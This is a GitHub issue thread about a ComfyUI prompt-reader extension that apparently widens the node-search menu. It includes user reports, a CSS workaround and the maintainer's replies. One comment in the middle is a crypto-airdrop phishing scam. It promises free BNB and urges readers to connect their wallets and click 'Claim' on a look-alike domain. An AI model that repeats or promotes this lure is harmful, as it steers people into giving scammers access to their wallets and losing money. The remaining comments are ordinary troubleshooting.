### ISSUE TITLE
[BUG] - Double-click menu to add nodes is very long

### ISSUE THREAD

**Issue by throttlekitty** [receyuki/comfyui-prompt-reader-node#21]
### Description

With this extension loaded, the background-double click menu to add a node becomes much wider than the screen. Removing it and restarting comfyui show this menu in regular behavior.

Both Comfyui and prompt-reader-node are up to date on my end.

### Image file

![image](https://github.com/receyuki/comfyui-prompt-reader-node/assets/1191406/dd342987-2e6e-4cf3-9508-5633be660512)

### Version

1.0.0

**Comment by receyuki** [comment]
I cannot reproduce this issue, everything is working fine on my end. So I guess there might be a conflict between the prompt reader and another extension.

**Comment by halr9000** [comment]
I'm having the same behavior, and tried to resolve by disabling prompt reader, but it made no difference. So it may not be this node at all. Back to [the issue](https://github.com/comfyanonymous/ComfyUI/issues/1867) that sent me here...

**Comment by throttlekitty** [comment]
> I cannot reproduce this issue, everything is working fine on my end. So I guess there might be a conflict between the prompt reader and another extension.

It might be a combination of custom nodes then, I'll try to look into that soon.

**Comment by cjps-br** [comment]
I'm also having the same problem. I tried a solution that seems to have resolved it:

I edited the file /ComfyUI_windows_portable/ComfyUI/web/user.css
adding the following:

/* Put custom styles here */

.litegraph.litesearchbox input,
.litegraph.litesearchbox select {
     max-width: 400px;
}

When starting comfyui again, the box width problem seems to have been resolved.

**Comment by cjps-br** [comment]
I updated the environment (comfyui and custom nodes) and the user.css file that I had modified was deleted. I recreated the file as above and everything returned to normal. Now I have to research how to prevent the user.css file from being deleted with each environment update.

**Comment by receyuki** [comment]
Does anyone have any updates on this issue? Since I cannot reproduce the bug, I’m not sure if it’s an issue with my nodes.

**Comment by halr9000** [comment]
> Does anyone have any updates on this issue? Since I cannot reproduce the bug, I’m not sure if it’s an issue with my nodes.

For the record, I only thought it was your nodes for a moment. I do not think it's your stuff.

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @nsdown, @Wahitler, @Grand-Grand, @pingker, @yysf752881306, @macong0420, @zheshiyigehaomingzi

**Comment by Amit30swgoh** [comment]
yes very long and freezes all especially for low end pc who are useing google colab and cloudflare to run it on thier browser chrome
how can we disable it <html>
<body>

Double-Click LMB
--


<br class="Apple-interchange-newline">
</body>
</html>
